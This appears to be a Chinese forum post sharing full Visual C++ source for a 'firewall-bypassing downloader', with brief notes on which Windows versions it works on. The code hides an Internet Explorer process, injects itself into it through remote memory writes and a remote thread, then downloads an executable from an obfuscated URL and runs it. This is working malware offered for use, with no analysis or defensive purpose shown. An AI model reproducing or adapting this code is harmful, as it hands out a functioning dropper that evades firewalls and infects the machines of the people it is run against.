3k穿墙下载者VC源代码
测试环境 winserver 2003 通过能运行和下载，
测试环境 windows 7   可运行，但下载不了。
==============================
#include <windows.h>  
#pragma comment(lib,"user32.lib")  
#pragma comment(lib,"kernel32.lib")  
//#pragma comment(linker, "/OPT:NOWIN98")   //取消这几行的注释，编译出的文件只有2K大小  
//#pragma comment(linker, "/merge:.data=.text")     
//#pragma comment(linker, "/merge:.rdata=.text")     
//#pragma comment(linker, "/align:0x200")  
#pragma comment(linker, "/ENTRY:main")     
#pragma comment(linker, "/subsystem:windows")  
#pragma comment(linker, "/BASE:0x13150000")  
     
   HINSTANCE (WINAPI *SHELLRUN)(HWND,LPCTSTR, LPCTSTR, LPCTSTR ,LPCTSTR , int );//动态加载shell32.dll中的ShellExecuteA函数  
   DWORD(WINAPI *DOWNFILE) (LPCTSTR ,LPCTSTR, LPCTSTR ,DWORD, LPCTSTR);//动态加载Urlmon.dll中的UrlDownloadToFileA函数  
   HANDLE processhandle;  
   DWORD pid;  
   HINSTANCE hshell,hurlmon;  
void download() //注入使用的下载函数  
{  
   hshell=LoadLibrary("Shell32.dll");  
   hurlmon=LoadLibrary("urlmon.dll");  
   (FARPROC&)SHELLRUN=GetProcAddress(hshell,"ShellExecuteA");  
   (FARPROC&)DOWNFILE= GetProcAddress(hurlmon,"URLDownloadToFileA");  
   DOWNFILE(NULL,"fceK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4S2^5P5s2S2^5P5s2S2Q4x3X3g2U0L8W2)9J5c8X3g2F1i4K6u0r3L8X3!0@1k6i4m8S2k6q4)9J5k6h3g2^5k6b7`.`.","c://ieinst12.exe",0, NULL);  
   SHELLRUN(0,"open","c://ieinst12.exe",NULL,NULL,5);  
   ExitProcess(0);  
};  
     
void main() //主函数  
{     
    //1.得到IE路径,并运行  
   char iename[MAX_PATH],iepath[MAX_PATH];  
   ZeroMemory(iename,sizeof(iename));  
   ZeroMemory(iepath,sizeof(iepath));  
   GetWindowsDirectory(iepath,MAX_PATH);  
   strncpy(iename,iepath,3);  
   strcat(iename,"program files//Internet Explorer//IEXPLORE.EXE");  
   //strcat(iename,"windows//notepad.EXE");  
   WinExec(iename,SW_HIDE);  
   Sleep(500);  
   //2.得到 IE process handle  
   HWND htemp;  
   htemp=FindWindow("IEFrame",NULL);  
   GetWindowThreadProcessId(htemp,&pid);  
   processhandle=OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);  
     
   //3.分配内存  
   HMODULE Module;  
   LPVOID NewModule;  
   DWORD Size;  
   LPDWORD lpimagesize;  
   Module = GetModuleHandle(NULL);//进程映像的基址  
   //得到内存镜像大小  
   _asm  
   {  
       push eax;  
       push ebx;  
       mov ebx,Module;  
       mov eax,[ebx+0x3c];  
       lea eax,[ebx+eax+0x50];      
       mov eax,[eax]  
       mov lpimagesize,eax;  
       pop ebx;  
       pop eax;  
   };  
   Size=(DWORD)lpimagesize;  
   NewModule = VirtualAllocEx(processhandle, Module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);//确定起始基址和内存映像基址的位置  
   //4.写内存，创建线程  
   WriteProcessMemory(processhandle, NewModule, Module, Size, NULL);//写数据  
   LPTHREAD_START_ROUTINE entrypoint;  
   __asm  
   {  
       push eax;  
       lea eax,download;  
       mov entrypoint,eax;  
       pop eax  
   }  
     
   CreateRemoteThread(processhandle, NULL, 0, entrypoint, Module, 0, NULL);    //建立远程线程,并运行  
     
   //5.关闭对象  
   CloseHandle(processhandle);  
   return;  
}

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课